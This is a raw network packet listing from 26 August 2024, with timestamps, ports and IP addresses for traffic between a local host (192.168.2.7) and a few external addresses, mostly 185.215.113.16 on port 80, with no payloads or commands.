Aug 26, 2024 23:29:23.648701906 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.648722887 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.648722887 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.648756027 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.667815924 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:23.669553995 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:23.674628019 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:23.692596912 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:23.698160887 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.698225975 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:23.698251009 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.698260069 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.698266983 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.698329926 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:23.698452950 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.698462009 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.698471069 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.698600054 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.698781967 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.698791027 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.698863029 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.703093052 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.703363895 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.703438044 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.703447104 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.713428020 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713499069 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713504076 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.713509083 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713583946 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.713610888 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713622093 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713630915 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713653088 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713663101 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.713666916 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713676929 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713689089 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713696003 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.713699102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713710070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713726997 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713728905 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.713738918 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713748932 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713758945 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713758945 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.713778019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713778973 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.713788986 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.713789940 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713799953 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713810921 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713814020 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.713820934 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713831902 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.713840961 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.713840961 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.713896036 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.713896036 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.717952013 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.717963934 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.717976093 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.718039989 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.718049049 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.718055964 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.718059063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.718070984 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.718082905 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.718161106 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.718209982 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.719090939 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.719106913 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.719118118 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.719127893 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.719139099 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.719150066 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.719161987 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.719172001 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.719177008 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.719187975 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.719187975 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.719439030 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.726833105 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.726844072 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.726855993 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.726924896 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.726924896 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.726948977 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.726959944 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.726970911 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.726980925 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727051020 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.727063894 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727076054 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727086067 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727097988 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727124929 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.727124929 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.727150917 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727161884 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727173090 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727189064 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.727226973 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.727420092 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.727751970 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727761984 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727772951 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727830887 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.727833986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727844954 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727854967 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727864981 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727879047 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727885008 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.727905989 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.727931023 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727931976 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.727931976 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.727941990 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727952957 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727966070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727977037 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.727987051 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.728018045 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.728018045 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.728332996 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.728344917 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.728353977 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.728364944 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.728377104 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.728388071 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.728399992 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.728415012 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.728424072 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.728424072 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.728424072 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.728426933 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.728451014 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.728521109 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.728976965 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.728993893 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729003906 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729015112 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729026079 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729036093 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729048014 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729054928 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.729058981 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729062080 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.729072094 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729075909 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.729084015 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729094982 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729110956 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729126930 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729127884 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.729137897 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729152918 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729155064 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.729155064 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.729168892 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729181051 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729191065 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729197979 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.729202986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729213953 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729223013 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729234934 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.729234934 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.729238033 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729255915 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729266882 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729279041 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729284048 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.729290009 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.729358912 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.729358912 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.729358912 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.730015993 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.730025053 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.730077982 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.730186939 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.734587908 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.734599113 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.734611034 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.734656096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.734659910 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.734668016 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.734679937 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.734690905 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.734699965 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.734699965 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.734747887 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.734747887 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.739597082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.739609003 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.739619970 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.739686966 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.739686966 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.739789963 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.739799976 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.739810944 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.739823103 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.739896059 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.739896059 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.804544926 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804562092 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804574013 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804585934 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804598093 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804637909 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.804675102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804687977 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804699898 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804706097 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.804718018 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804745913 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.804745913 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.804748058 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804759979 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804771900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804776907 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.804783106 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804795027 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.804831982 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.804894924 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.805198908 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.805208921 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.805219889 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.805232048 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.805243969 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.805257082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.805268049 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.805268049 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.805289984 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.805308104 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.805308104 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.808856964 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.808867931 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.808878899 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.808890104 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.808900118 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.808913946 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.808928967 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.808948994 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.808948994 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.809011936 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.809954882 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.809967041 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.809984922 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.810015917 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.810067892 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.810079098 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.810086966 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.810090065 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.810101986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.810142994 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.810152054 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.810153008 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.817527056 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817634106 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817642927 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817682981 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817692995 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817704916 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817723036 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817724943 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.817766905 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817779064 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817790031 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817800999 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817811966 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817820072 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.817820072 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.817822933 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817836046 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817847013 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.817869902 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.817869902 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.817912102 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.818607092 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818618059 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818629026 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818675041 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.818684101 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818695068 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818713903 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818731070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818743944 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.818743944 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.818756104 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.818803072 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818815947 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818828106 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818837881 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.818841934 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818852901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818865061 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818876982 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818886042 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.818886042 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.818905115 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.818937063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818948984 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818958044 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818973064 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.818973064 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818991899 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.818994999 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.819004059 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.819016933 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.819031954 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.819036007 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.819036007 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.819071054 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.819071054 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.819082975 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.819094896 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.819108009 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.819120884 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.819120884 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.819422960 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.819444895 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.819607973 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.819655895 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.819710016 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.819720030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.819736958 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.819765091 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.819814920 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.819880009 CEST	80	49734	185.215.113.16	192.168.2.7
